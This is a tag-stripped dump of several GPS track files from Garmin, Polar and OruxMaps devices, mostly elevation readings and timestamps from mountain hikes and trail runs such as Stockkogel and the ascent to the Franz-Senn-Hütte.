+2010-01-01T00:02:57Z
+
+
+1631.0
+2010-01-01T00:03:07Z
+
+
+1644.0
+2010-01-01T00:03:34Z
+
+
+1667.0
+2010-01-01T00:04:08Z
+
+
+1694.0
+2010-01-01T00:04:41Z
+
+
+1698.0
+2010-01-01T00:04:55Z
+
+
+1708.0
+2010-01-01T00:05:07Z
+
+
+1714.0
+2010-01-01T00:05:26Z
+
+
+1721.0
+2010-01-01T00:05:48Z
+
+
+1734.0
+2010-01-01T00:06:09Z
+
+
+1780.0
+2010-01-01T00:07:19Z
+
+
+1846.0
+2010-01-01T00:08:22Z
+
+
+1900.0
+2010-01-01T00:08:58Z
+
+
+1915.0
+2010-01-01T00:09:33Z
+
+
+1936.0
+2010-01-01T00:09:48Z
+
+
+1944.0
+2010-01-01T00:10:23Z
+
+
+1966.0
+2010-01-01T00:10:36Z
+
+
+1991.0
+2010-01-01T00:10:51Z
+
+
+2002.0
+2010-01-01T00:11:17Z
+
+
+2035.0
+2010-01-01T00:11:35Z
+
+
+2091.0
+2010-01-01T00:12:41Z
+
+
+2087.0
+2010-01-01T00:13:09Z
+
+
+2049.0
+2010-01-01T00:14:26Z
+
+
+2087.0
+2010-01-01T00:15:44Z
+
+
+2091.0
+2010-01-01T00:16:12Z
+
+
+2087.0
+2010-01-01T00:16:25Z
+
+
+2094.0
+2010-01-01T00:16:46Z
+
+
+2098.0
+2010-01-01T00:17:10Z
+
+
+2099.0
+2010-01-01T00:17:46Z
+
+
+2098.0
+2010-01-01T00:18:22Z
+
+
+2094.0
+2010-01-01T00:18:47Z
+
+
+2087.0
+2010-01-01T00:19:08Z
+
+
+2091.0
+2010-01-01T00:19:21Z
+
+
+2087.0
+2010-01-01T00:19:49Z
+
+
+2046.0
+2010-01-01T00:21:13Z
+
+
+2042.0
+2010-01-01T00:21:36Z
+
+
+2040.0
+2010-01-01T00:22:13Z
+
+
+2045.0
+2010-01-01T00:23:11Z
+
+
+2057.0
+2010-01-01T00:24:01Z
+
+
+2053.0
+2010-01-01T00:24:06Z
+
+
+1947.0
+2010-01-01T00:25:17Z
+
+
+1949.0
+2010-01-01T00:25:33Z
+
+
+1857.0
+2010-01-01T00:27:25Z
+
+
+1860.0
+2010-01-01T00:28:15Z
+
+
+1872.0
+2010-01-01T00:28:30Z
+
+
+1840.0
+2010-01-01T00:29:14Z
+
+
+1836.0
+2010-01-01T00:30:07Z
+
+
+1810.0
+2010-01-01T00:30:31Z
+
+
+1808.0
+2010-01-01T00:30:54Z
+
+
+1783.0
+2010-01-01T00:32:13Z
+
+
+1779.0
+2010-01-01T00:33:05Z
+
+
+1775.0
+2010-01-01T00:33:20Z
+
+
+1763.0
+2010-01-01T00:33:59Z
+
+
+1734.0
+2010-01-01T00:34:42Z
+
+
+1721.0
+2010-01-01T00:35:03Z
+
+
+1714.0
+2010-01-01T00:35:25Z
+
+
+1708.0
+2010-01-01T00:35:44Z
+
+
+1698.0
+2010-01-01T00:35:56Z
+
+
+1694.0
+2010-01-01T00:36:10Z
+
+
+1667.0
+2010-01-01T00:36:43Z
+
+
+1644.0
+2010-01-01T00:37:17Z
+
+
+1631.0
+2010-01-01T00:37:44Z
+
+
+1625.0
+2010-01-01T00:37:54Z
+
+
+1592.0
+2010-01-01T00:38:47Z
+
+
+1576.0
+2010-01-01T00:39:18Z
+
+
+1562.0
+2010-01-01T00:40:00Z
+
+
+1558.0
+2010-01-01T00:40:35Z
+
+
+1557.0
+2010-01-01T00:40:52Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-03-15T21:06:28Z
+
+
+Aktueller Track: 15 MRZ 2015 10:00
+
+
+
+
+
+
+734.58
+2015-03-15T09:00:24Z
+
+
+686.39453125
+
+
+686.0546875
+
+
+685.734375
+
+
+685.328125
+
+
+718.72
+2015-03-15T09:09:47Z
+
+
+717.76
+2015-03-15T09:11:03Z
+
+
+706.23
+2015-03-15T09:16:16Z
+
+
+702.38
+2015-03-15T09:18:19Z
+
+
+694.69
+2015-03-15T09:21:32Z
+
+
+687.0
+2015-03-15T09:24:35Z
+
+
+672.58
+2015-03-15T09:28:40Z
+
+
+666.81
+2015-03-15T09:30:45Z
+
+
+662.01
+2015-03-15T09:33:19Z
+
+
+661.04
+2015-03-15T09:34:29Z
+
+
+659.12
+2015-03-15T09:38:18Z
+
+
+656.72
+2015-03-15T09:41:48Z
+
+
+656.24
+2015-03-15T09:44:32Z
+
+
+652.87
+2015-03-15T09:49:32Z
+
+
+652.87
+2015-03-15T09:51:22Z
+
+
+658.16
+2015-03-15T09:53:40Z
+
+
+652.87
+2015-03-15T09:57:26Z
+
+
+649.99
+2015-03-15T10:02:11Z
+
+
+650.47
+2015-03-15T10:02:21Z
+
+
+648.07
+2015-03-15T10:06:34Z
+
+
+647.1
+2015-03-15T10:08:36Z
+
+
+646.14
+2015-03-15T10:11:25Z
+
+
+646.62
+2015-03-15T10:11:59Z
+
+
+646.14
+2015-03-15T10:12:48Z
+
+
+646.62
+2015-03-15T10:13:04Z
+
+
+643.74
+2015-03-15T10:14:36Z
+
+
+648.55
+2015-03-15T10:18:48Z
+
+
+649.03
+2015-03-15T10:20:01Z
+
+
+649.03
+2015-03-15T10:20:25Z
+
+
+649.99
+2015-03-15T10:21:48Z
+
+
+650.47
+2015-03-15T10:23:18Z
+
+
+650.95
+2015-03-15T10:25:13Z
+
+
+650.95
+2015-03-15T10:28:04Z
+
+
+651.91
+2015-03-15T10:28:23Z
+
+
+652.87
+2015-03-15T10:30:01Z
+
+
+653.83
+2015-03-15T10:31:57Z
+
+
+653.35
+2015-03-15T10:32:52Z
+
+
+655.28
+2015-03-15T10:36:20Z
+
+
+654.8
+2015-03-15T10:39:09Z
+
+
+672.58
+2015-03-15T10:41:46Z
+
+
+678.35
+2015-03-15T10:43:37Z
+
+
+667.29
+2015-03-15T10:46:05Z
+
+
+659.6
+2015-03-15T10:49:00Z
+
+
+663.93
+2015-03-15T10:50:55Z
+
+
+661.52
+2015-03-15T10:51:43Z
+
+
+662.97
+2015-03-15T10:57:12Z
+
+
+659.12
+2015-03-15T11:00:26Z
+
+
+662.97
+2015-03-15T11:01:14Z
+
+
+668.25
+2015-03-15T11:01:50Z
+
+
+673.06
+2015-03-15T11:03:39Z
+
+
+673.54
+2015-03-15T11:04:00Z
+
+
+675.46
+2015-03-15T11:04:48Z
+
+
+676.91
+2015-03-15T11:06:00Z
+
+
+678.83
+2015-03-15T11:06:45Z
+
+
+683.63
+2015-03-15T11:08:41Z
+
+
+683.63
+2015-03-15T11:11:12Z
+
+
+677.91796875
+
+
+677.25
+
+
+685.34375
+
+
+686.40234375
+
+
+686.390625
+
+
+681.71
+2015-03-15T11:11:47Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-09-29T15:00:27Z
+
+2016-09-29 16:37:42-Trail Run
+
+
+
+
+
+1982.86
+2016-09-29T11:30:47Z
+
+
+1976.61
+2016-09-29T11:31:39Z
+
+
+1972.28
+2016-09-29T11:32:43Z
+
+
+1975.65
+2016-09-29T11:32:59Z
+
+
+1981.41
+2016-09-29T11:33:11Z
+
+
+1988.14
+2016-09-29T11:33:36Z
+
+
+2032.36
+2016-09-29T11:41:18Z
+
+
+2046.3
+2016-09-29T11:42:32Z
+
+
+2065.05
+2016-09-29T11:44:01Z
+
+
+2045.34
+2016-09-29T11:53:24Z
+
+
+2039.57
+2016-09-29T12:03:20Z
+
+
+2053.99
+2016-09-29T12:08:34Z
+
+
+2067.45
+2016-09-29T12:15:04Z
+
+
+2082.35
+2016-09-29T12:16:15Z
+
+
+2085.72
+2016-09-29T12:17:13Z
+
+
+2084.76
+2016-09-29T12:18:02Z
+
+
+2085.24
+2016-09-29T12:19:09Z
+
+
+2092.93
+2016-09-29T12:22:05Z
+
+
+2090.52
+2016-09-29T12:27:52Z
+
+
+2103.02
+2016-09-29T12:32:27Z
+
+
+2113.6
+2016-09-29T12:35:30Z
+
+
+2116.96
+2016-09-29T12:37:52Z
+
+
+2126.09
+2016-09-29T12:41:43Z
+
+
+2118.4
+2016-09-29T12:46:31Z
+
+
+2097.73
+2016-09-29T12:49:31Z
+
+
+2109.27
+2016-09-29T12:54:33Z
+
+
+2075.62
+2016-09-29T13:12:22Z
+
+
+2021.79
+2016-09-29T13:21:46Z
+
+
+2001.6
+2016-09-29T13:23:06Z
+
+
+1999.2
+2016-09-29T13:35:07Z
+
+
+2000.16
+2016-09-29T13:35:29Z
+
+
+2011.22
+2016-09-29T13:36:32Z
+
+
+2025.64
+2016-09-29T13:37:45Z
+
+
+2017.94
+2016-09-29T13:40:06Z
+
+
+2013.62
+2016-09-29T13:40:41Z
+
+
+2007.37
+2016-09-29T13:41:07Z
+
+
+2001.6
+2016-09-29T13:41:27Z
+
+
+1996.8
+2016-09-29T13:41:53Z
+
+
+1977.57
+2016-09-29T13:43:11Z
+
+
+1960.75
+2016-09-29T13:44:40Z
+
+
+1956.9
+2016-09-29T13:44:46Z
+
+
+1944.88
+2016-09-29T13:45:30Z
+
+
+1920.85
+2016-09-29T13:46:44Z
+
+
+1908.83
+2016-09-29T13:47:26Z
+
+
+1902.59
+2016-09-29T13:47:40Z
+
+
+1886.72
+2016-09-29T13:48:15Z
+
+
+1873.75
+2016-09-29T13:49:43Z
+
+
+1858.85
+2016-09-29T13:50:35Z
+
+
+1830.49
+2016-09-29T13:52:54Z
+
+
+1825.2
+2016-09-29T13:54:25Z
+
+
+1815.11
+2016-09-29T13:57:00Z
+
+
+1809.34
+2016-09-29T13:58:29Z
+
+
+1805.97
+2016-09-29T14:00:03Z
+
+
+1803.57
+2016-09-29T14:01:20Z
+
+
+1801.17
+2016-09-29T14:05:03Z
+
+
+1808.86
+2016-09-29T14:08:32Z
+
+
+1826.16
+2016-09-29T14:10:38Z
+
+
+1835.77
+2016-09-29T14:15:41Z
+
+
+1837.22
+2016-09-29T14:16:03Z
+
+
+1845.39
+2016-09-29T14:16:56Z
+
+
+1876.63
+2016-09-29T14:19:23Z
+
+
+1888.65
+2016-09-29T14:20:22Z
+
+
+1904.99
+2016-09-29T14:21:56Z
+
+
+1910.76
+2016-09-29T14:22:28Z
+
+
+1920.37
+2016-09-29T14:23:07Z
+
+
+1924.22
+2016-09-29T14:23:24Z
+
+
+1928.06
+2016-09-29T14:24:00Z
+
+
+1946.33
+2016-09-29T14:25:47Z
+
+
+1953.54
+2016-09-29T14:26:21Z
+
+
+1958.34
+2016-09-29T14:26:51Z
+
+
+1971.8
+2016-09-29T14:28:02Z
+
+
+1979.97
+2016-09-29T14:30:07Z
+
+
+1991.99
+2016-09-29T14:32:21Z
+ "
+"
+
+
+Hohsaas
+
+
+
+
+
+
+
+
+
+2395.9
+
+
+2404.8000335106053
+
+
+2416.0954781345317
+
+
+2427.6
+
+
+2440.5
+
+
+2451.4999094027385
+
+
+2458.7341251907774
+
+
+2462.39999885276
+
+
+2484.600075656143
+
+
+2498.999923184589
+
+
+2504.399986619206
+
+
+2513.4999073776667
+
+
+2532.5999450517656
+
+
+2541.19996473592
+
+
+2553.455143089319
+
+
+2566.4998934678497
+
+
+2571.399842563747
+
+
+2590.100089161819
+
+
+2603.340612753003
+
+
+2607.0
+
+
+2613.3000028954634
+
+
+2619.599887034982
+
+
+2631.6
+
+
+2639.700006868304
+
+
+2644.2
+
+
+2650.5999284656045
+
+
+2656.408187903452
+
+
+2656.3141699860666
+
+
+2661.3175976408897
+
+
+2668.461313959586
+
+
+2675.2
+
+
+2686.1999256368986
+
+
+2696.799969610013
+
+
+2704.199949194789
+
+
+2711.2
+
+
+2717.4
+
+
+2722.4
+
+
+2726.1
+
+
+2733.0000571973446
+
+
+2756.7000313494655
+
+
+2770.5000800165403
+
+
+2800.6999888106507
+
+
+2808.1338561191433
+
+
+2820.906876771809
+
+
+2827.5
+
+
+2833.1999196912066
+
+
+2839.6998979501027
+
+
+2903.3999809281636
+
+
+2966.299897859427
+
+
+2981.1001446491423
+
+
+3010.6001011587346
+
+
+3023.499947602944
+
+
+3049.0000340955216
+
+
+3098.171307695371
+
+
+3114.6
+
+
+3119.4
+
+
+3118.5
+
+
+3121.999952209325
+
+
+3087.699926873053
+
+
+3087.7
+
+
+3083.6589579733386
+
+
+3086.599964545129
+
+
+3068.7
+
+
+3070.5000209273294
+
+
+3073.4999379143533
+
+
+3087.600020161014
+
+
+3100.555625095149
+
+
+3104.0000189622106
+
+
+3131.9000635634757
+
+
+3137.4
+ "
+"
+
+
+
+Polar
+
+
+
+2016-05-08T10:06:04Z
+
+
+
+
+710.0
+2016-05-08T10:06:19Z
+
+
+692.0
+2016-05-08T10:09:16Z
+
+
+684.0
+2016-05-08T10:11:01Z
+
+
+703.0
+2016-05-08T10:13:00Z
+
+
+708.0
+2016-05-08T10:13:42Z
+
+
+719.0
+2016-05-08T10:14:54Z
+
+
+729.0
+2016-05-08T10:17:31Z
+
+
+741.0
+2016-05-08T10:19:03Z
+
+
+754.0
+2016-05-08T10:20:56Z
+
+
+767.0
+2016-05-08T10:22:10Z
+
+
+778.0
+2016-05-08T10:23:39Z
+
+
+790.0
+2016-05-08T10:24:26Z
+
+
+791.0
+2016-05-08T10:25:13Z
+
+
+807.0
+2016-05-08T10:27:37Z
+
+
+824.0
+2016-05-08T10:28:50Z
+
+
+824.0
+2016-05-08T10:30:01Z
+
+
+838.0
+2016-05-08T10:32:43Z
+
+
+854.0
+2016-05-08T10:33:58Z
+
+
+898.0
+2016-05-08T10:39:08Z
+
+
+936.0
+2016-05-08T10:44:28Z
+
+
+963.0
+2016-05-08T10:47:47Z
+
+
+1013.0
+2016-05-08T10:56:00Z
+
+
+1043.0
+2016-05-08T10:59:24Z
+
+
+1082.0
+2016-05-08T11:06:36Z
+
+
+1160.0
+2016-05-08T11:18:11Z
+
+
+1196.0
+2016-05-08T11:23:26Z
+
+
+1252.0
+2016-05-08T11:31:37Z
+
+
+1314.0
+2016-05-08T11:42:39Z
+
+
+1354.0
+2016-05-08T11:50:24Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-10-05T16:43:00Z
+
+
+Traccia corrente: 05 OTT 2016 08:29
+
+
+
+
+
+
+561.55
+2016-10-05T06:29:03Z
+
+
+573.56
+2016-10-05T06:31:03Z
+
+
+579.33
+2016-10-05T06:32:03Z
+
+
+586.06
+2016-10-05T06:44:33Z
+
+
+573.56
+2016-10-05T07:03:03Z
+
+
+573.56
+2016-10-05T07:12:02Z
+
+
+571.64
+2016-10-05T07:17:02Z
+
+
+572.6
+2016-10-05T07:30:32Z
+
+
+569.72
+2016-10-05T07:37:02Z
+
+
+569.72
+2016-10-05T07:39:02Z
+
+
+568.28
+2016-10-05T07:42:02Z
+
+
+564.91
+2016-10-05T07:53:02Z
+
+
+565.87
+2016-10-05T07:58:32Z
+
+
+562.51
+2016-10-05T08:11:58Z
+
+
+555.3
+2016-10-05T08:19:24Z
+
+
+563.95
+2016-10-05T08:27:20Z
+
+
+562.51
+2016-10-05T08:30:49Z
+
+
+562.51
+2016-10-05T08:33:48Z
+
+
+565.39
+2016-10-05T08:35:17Z
+
+
+568.28
+2016-10-05T08:37:46Z
+
+
+570.68
+2016-10-05T08:39:44Z
+
+
+571.16
+2016-10-05T08:40:44Z
+
+
+573.08
+2016-10-05T08:42:43Z
+
+
+572.6
+2016-10-05T08:44:13Z
+
+
+572.12
+2016-10-05T08:45:13Z
+
+
+570.68
+2016-10-05T09:00:05Z
+
+
+573.08
+2016-10-05T09:05:05Z
+
+
+580.77
+2016-10-05T09:14:35Z
+
+
+581.73
+2016-10-05T09:17:35Z
+
+
+582.7
+2016-10-05T09:27:35Z
+
+
+591.35
+2016-10-05T09:40:05Z
+
+
+582.22
+2016-10-05T09:45:05Z
+
+
+577.41
+2016-10-05T09:46:05Z
+
+
+565.87
+2016-10-05T09:48:05Z
+
+
+563.95
+2016-10-05T09:50:05Z
+
+
+562.51
+2016-10-05T09:53:02Z
+ "
+"
+
+
+pic foreant
+
+
+
+
+
+OruxMaps
+2015-09-23T10:01:07Z
+
+
+pic foreant
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pic foreant</h2><br /><p>Startzeit: 09/23/2015 12:01</p><p>Zielzeit: 09/23/2015 14:17</p><p>Strecke: 4,4km (02:16)</p><p>Bewegungszeit: 01:32</p><p>Ø-Geschwindigkeit: 1,9km/h</p><p>Netto-Geschwindigkeit: 2,9km/h</p><p>Max. Geschwindigkeit: 6,3km/h</p><p>Minimale Höhe: 2574m</p><p>Maximale Höhe: 3028m</p><p>Steig-Geschw.: 374m/h</p><p>Sink-Geschw.: -443,1m/h</p><p>Aufstieg: 456m</p><p>Abstieg: -457m</p><p>Steigzeit: 01:13</p><p>Sinkzeit: 01:01</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2579.77
+2015-09-23T10:01:08Z
+
+
+2582.39
+2015-09-23T10:04:45Z
+
+
+2583.13
+2015-09-23T10:05:16Z
+
+
+2588.73
+2015-09-23T10:05:45Z
+
+
+2603.42
+2015-09-23T10:09:07Z
+
+
+2626.79
+2015-09-23T10:12:15Z
+
+
+2638.53
+2015-09-23T10:14:16Z
+
+
+2636.88
+2015-09-23T10:14:41Z
+
+
+2665.76
+2015-09-23T10:17:42Z
+
+
+2680.66
+2015-09-23T10:18:50Z
+
+
+2678.66
+2015-09-23T10:22:46Z
+
+
+2670.17
+2015-09-23T10:23:35Z
+
+
+2704.47
+2015-09-23T10:26:24Z
+
+
+2731.14
+2015-09-23T10:29:09Z
+
+
+2739.11
+2015-09-23T10:30:33Z
+
+
+2757.64
+2015-09-23T10:32:49Z
+
+
+2790.34
+2015-09-23T10:36:16Z
+
+
+2795.75
+2015-09-23T10:36:53Z
+
+
+2809.26
+2015-09-23T10:38:24Z
+
+
+2860.18
+2015-09-23T10:43:20Z
+
+
+2893.26
+2015-09-23T10:49:24Z
+
+
+2907.14
+2015-09-23T10:53:24Z
+
+
+2932.24
+2015-09-23T10:56:30Z
+
+
+2966.54
+2015-09-23T11:00:00Z
+
+
+2965.7
+2015-09-23T11:01:18Z
+
+
+2962.77
+2015-09-23T11:01:44Z
+
+
+2973.76
+2015-09-23T11:03:14Z
+
+
+2996.64
+2015-09-23T11:06:26Z
+
+
+3028.64
+2015-09-23T11:16:32Z
+
+
+3023.51
+2015-09-23T11:25:34Z
+
+
+3016.67
+2015-09-23T11:26:40Z
+
+
+3010.64
+2015-09-23T11:28:14Z
+
+
+3001.77
+2015-09-23T11:29:03Z
+
+
+2982.65
+2015-09-23T11:31:25Z
+
+
+2972.51
+2015-09-23T11:32:38Z
+
+
+2962.7
+2015-09-23T11:34:18Z
+
+
+2938.14
+2015-09-23T11:36:49Z
+
+
+2920.64
+2015-09-23T11:39:02Z
+
+
+2917.16
+2015-09-23T11:39:42Z
+
+
+2869.64
+2015-09-23T11:45:40Z
+
+
+2849.65
+2015-09-23T11:47:27Z
+
+
+2816.67
+2015-09-23T11:50:59Z
+
+
+2809.77
+2015-09-23T11:51:27Z
+
+
+2799.65
+2015-09-23T11:52:26Z
+
+
+2775.89
+2015-09-23T11:55:14Z
+
+
+2758.64
+2015-09-23T11:56:49Z
+
+
+2744.64
+2015-09-23T11:58:11Z
+
+
+2718.51
+2015-09-23T12:00:45Z
+
+
+2688.77
+2015-09-23T12:04:16Z
+
+
+2676.2
+2015-09-23T12:06:26Z
+
+
+2653.63
+2015-09-23T12:08:35Z
+
+
+2650.66
+2015-09-23T12:09:16Z
+
+
+2643.74
+2015-09-23T12:10:10Z
+
+
+2631.64
+2015-09-23T12:11:33Z
+
+
+2622.67
+2015-09-23T12:12:41Z
+
+
+2594.74
+2015-09-23T12:15:16Z
+
+
+2582.17
+2015-09-23T12:16:16Z
+
+
+2578.76
+2015-09-23T12:17:07Z
+
+
+2575.67
+2015-09-23T12:17:44Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Stockkogel
+
+
+
+
+
+OruxMaps
+2015-08-07T07:46:03Z
+
+
+Stockkogel
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Stockkogel</h2><br /><p>Startzeit: 08/07/2015 09:46</p><p>Zielzeit: 08/07/2015 13:50</p><p>Strecke: 6km (04:04)</p><p>Bewegungszeit: 01:58</p><p>Ø-Geschwindigkeit: 1,5km/h</p><p>Netto-Geschwindigkeit: 3km/h</p><p>Max. Geschwindigkeit: 7,5km/h</p><p>Minimale Höhe: 1817m</p><p>Maximale Höhe: 3106m</p><p>Steig-Geschw.: 356,3m/h</p><p>Sink-Geschw.: -349,4m/h</p><p>Aufstieg: 1357m</p><p>Abstieg: -80m</p><p>Steigzeit: 03:48</p><p>Sinkzeit: 00:13</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1828.34
+2015-08-07T07:46:06Z
+
+
+1836.06
+2015-08-07T07:48:19Z
+
+
+1825.1
+2015-08-07T07:49:31Z
+
+
+1817.48
+2015-08-07T07:49:46Z
+
+
+1820.94
+2015-08-07T07:50:54Z
+
+
+1833.53
+2015-08-07T07:52:17Z
+
+
+1850.4
+2015-08-07T07:54:28Z
+
+
+1859.93
+2015-08-07T07:55:42Z
+
+
+1859.85
+2015-08-07T07:57:53Z
+
+
+1865.81
+2015-08-07T07:58:43Z
+
+
+1862.67
+2015-08-07T07:59:46Z
+
+
+1886.55
+2015-08-07T08:02:04Z
+
+
+1904.58
+2015-08-07T08:04:34Z
+
+
+1915.51
+2015-08-07T08:06:28Z
+
+
+1922.53
+2015-08-07T08:09:27Z
+
+
+1950.94
+2015-08-07T08:12:32Z
+
+
+1964.9
+2015-08-07T08:14:06Z
+
+
+2000.9
+2015-08-07T08:17:06Z
+
+
+2057.06
+2015-08-07T08:21:38Z
+
+
+2114.94
+2015-08-07T08:27:47Z
+
+
+2117.09
+2015-08-07T08:28:59Z
+
+
+2147.97
+2015-08-07T08:31:07Z
+
+
+2167.43
+2015-08-07T08:36:20Z
+
+
+2172.88
+2015-08-07T08:37:11Z
+
+
+2179.56
+2015-08-07T08:38:38Z
+
+
+2228.94
+2015-08-07T08:43:28Z
+
+
+2241.41
+2015-08-07T08:44:21Z
+
+
+2273.03
+2015-08-07T08:46:24Z
+
+
+2294.09
+2015-08-07T08:48:57Z
+
+
+2340.47
+2015-08-07T08:53:50Z
+
+
+2345.6
+2015-08-07T08:54:41Z
+
+
+2361.12
+2015-08-07T08:56:13Z
+
+
+2382.71
+2015-08-07T08:59:02Z
+
+
+2413.97
+2015-08-07T09:02:26Z
+
+
+2428.48
+2015-08-07T09:03:50Z
+
+
+2442.92
+2015-08-07T09:04:30Z
+
+
+2443.99
+2015-08-07T09:06:02Z
+
+
+2452.59
+2015-08-07T09:07:11Z
+
+
+2476.03
+2015-08-07T09:09:53Z
+
+
+2500.05
+2015-08-07T09:11:26Z
+
+
+2520.05
+2015-08-07T09:14:16Z
+
+
+2538.56
+2015-08-07T09:17:36Z
+
+
+2557.94
+2015-08-07T09:20:01Z
+
+
+2566.19
+2015-08-07T09:21:25Z
+
+
+2582.18
+2015-08-07T09:32:36Z
+
+
+2594.06
+2015-08-07T09:34:20Z
+
+
+2618.69
+2015-08-07T09:36:40Z
+
+
+2611.82
+2015-08-07T09:37:09Z
+
+
+2671.31
+2015-08-07T09:45:31Z
+
+
+2674.1
+2015-08-07T09:46:38Z
+
+
+2671.62
+2015-08-07T09:47:29Z
+
+
+2675.53
+2015-08-07T09:48:47Z
+
+
+2673.44
+2015-08-07T09:49:02Z
+
+
+2679.96
+2015-08-07T09:49:34Z
+
+
+2677.33
+2015-08-07T09:51:29Z
+
+
+2687.91
+2015-08-07T09:58:50Z
+
+
+2732.06
+2015-08-07T10:05:43Z
+
+
+2784.34
+2015-08-07T10:15:35Z
+
+
+2797.58
+2015-08-07T10:16:23Z
+
+
+2839.44
+2015-08-07T10:22:39Z
+
+
+2849.94
+2015-08-07T10:24:22Z
+
+
+2852.1
+2015-08-07T10:26:38Z
+
+
+2892.06
+2015-08-07T10:31:11Z
+
+
+2911.53
+2015-08-07T10:37:09Z
+
+
+2936.44
+2015-08-07T10:44:55Z
+
+
+2970.44
+2015-08-07T11:03:58Z
+
+
+3022.06
+2015-08-07T11:12:02Z
+
+
+3106.04
+2015-08-07T11:50:46Z
+ "
+"
+
+
+
+
+
+
+2016-08-27T09:18:52Z
+
+Aufstieg Franz-Senn-Hütte
+
+
+
+1743.4
+2016-08-27T09:18:52Z
+
+
+1743.0
+2016-08-27T09:21:09Z
+
+
+1745.2
+2016-08-27T09:34:01Z
+
+
+1751.9
+2016-08-27T09:36:55Z
+
+
+1763.1
+2016-08-27T09:37:57Z
+
+
+1770.2
+2016-08-27T09:38:38Z
+
+
+1809.3
+2016-08-27T09:42:26Z
+
+
+1823.3
+2016-08-27T09:45:58Z
+
+
+1842.2
+2016-08-27T09:47:22Z
+
+
+1841.7
+2016-08-27T09:48:27Z
+
+
+1856.4
+2016-08-27T09:49:25Z
+
+
+1858.2
+2016-08-27T09:50:02Z
+
+
+1864.6
+2016-08-27T09:50:41Z
+
+
+1868.2
+2016-08-27T09:51:14Z
+
+
+1874.7
+2016-08-27T09:51:34Z
+
+
+1883.0
+2016-08-27T09:52:45Z
+
+
+1891.7
+2016-08-27T09:53:50Z
+
+
+1905.2
+2016-08-27T09:54:48Z
+
+
+1910.9
+2016-08-27T09:55:44Z
+
+
+1918.8
+2016-08-27T09:56:27Z
+
+
+1924.9
+2016-08-27T09:56:43Z
+
+
+1921.9
+2016-08-27T09:57:02Z
+
+
+1926.8
+2016-08-27T09:57:45Z
+
+
+1959.3
+2016-08-27T10:00:23Z
+
+
+1941.7
+2016-08-27T10:02:08Z
+
+
+1972.6
+2016-08-27T10:03:36Z
+
+
+1968.4
+2016-08-27T10:04:37Z
+
+
+1984.6
+2016-08-27T10:05:14Z
+
+
+1979.3
+2016-08-27T10:05:56Z
+
+
+1988.7
+2016-08-27T10:06:23Z
+
+
+2002.4
+2016-08-27T10:09:51Z
+
+
+2007.4
+2016-08-27T10:10:18Z
+
+
+2016.1
+2016-08-27T10:12:01Z
+
+
+2021.7
+2016-08-27T10:12:52Z
+
+
+2021.7
+2016-08-27T10:14:56Z
+
+
+2034.1
+2016-08-27T10:17:38Z
+
+
+2026.2
+2016-08-27T10:19:41Z
+
+
+2029.4
+2016-08-27T10:21:16Z
+
+
+2033.6
+2016-08-27T10:22:06Z
+
+
+2033.7
+2016-08-27T10:23:02Z
+
+
+2043.7
+2016-08-27T10:23:53Z
+
+
+2048.0
+2016-08-27T10:24:30Z
+
+
+2037.3
+2016-08-27T10:26:37Z
+
+
+2073.6
+2016-08-27T10:29:44Z
+
+
+2100.5
+2016-08-27T10:31:56Z
+
+
+2111.2
+2016-08-27T10:34:40Z
+
+
+2120.8
+2016-08-27T10:35:42Z
+
+
+2123.7
+2016-08-27T10:36:50Z
+
+
+2132.6
+2016-08-27T10:38:20Z
+
+
+2138.6
+2016-08-27T10:39:26Z
+
+
+2139.6
+2016-08-27T10:40:04Z
+
+
+2145.4
+2016-08-27T10:41:40Z
+
+
+2146.1
+2016-08-27T10:42:31Z
+
+
+2149.4
+2016-08-27T10:42:49Z
+
+
+2142.8
+2016-08-27T10:43:15Z
+
+
+2146.8
+2016-08-27T10:44:35Z
+
+
+2149.1
+2016-08-27T10:54:11Z
+
+
+2151.5
+2016-08-27T10:54:34Z
+ "
+"
+
+
+
+
+
+
+2015-05-10T07:30:14Z
+
+Cornizzolo Vertical
+
+
+
+248.0
+2015-05-10T07:30:14Z
+
+
+
+
+
+258.4
+2015-05-10T07:31:13Z
+
+
+
+
+
+264.0
+2015-05-10T07:31:42Z
+
+
+
+
+
+267.0
+2015-05-10T07:31:57Z
+
+
+
+
+
+268.8
+2015-05-10T07:32:04Z
+
+
+
+
+
+269.0
+2015-05-10T07:32:09Z
+
+
+
+
+
+275.4
+2015-05-10T07:32:39Z
+
+
+
+
+
+282.4
+2015-05-10T07:33:04Z
+
+
+
+
+
+291.8
+2015-05-10T07:33:37Z
+
+
+
+
+
+301.4
+2015-05-10T07:34:05Z
+
+
+
+
+
+369.2
+2015-05-10T07:37:47Z
+
+
+
+
+
+386.8
+2015-05-10T07:38:54Z
+
+
+
+
+
+395.6
+2015-05-10T07:39:15Z
+
+
+
+
+
+405.4
+2015-05-10T07:39:43Z
+
+
+
+
+
+428.0
+2015-05-10T07:40:51Z
+
+
+
+
+
+466.6
+2015-05-10T07:43:06Z
+
+
+
+
+
+487.2
+2015-05-10T07:44:16Z
+
+
+
+
+
+503.4
+2015-05-10T07:45:12Z
+
+
+
+
+
+531.8
+2015-05-10T07:46:50Z
+
+
+
+
+
+571.6
+2015-05-10T07:49:11Z
+
+
+
+
+
+579.8
+2015-05-10T07:49:41Z
+
+
+
+
+
+600.0
+2015-05-10T07:50:55Z
+
+
+
+
+
+615.2
+2015-05-10T07:51:48Z
+
+
+
+
+
+636.0
+2015-05-10T07:53:03Z
+
+
+
+
+
+682.2
+2015-05-10T07:55:53Z
+
+
+
+
+
+718.8
+2015-05-10T07:58:14Z
+
+
+
+
+
+737.6
+2015-05-10T07:59:29Z
+
+
+
+
+
+757.6
+2015-05-10T08:00:41Z
+
+
+
+
+
+826.0
+2015-05-10T08:04:48Z
+
+
+
+
+
+919.2
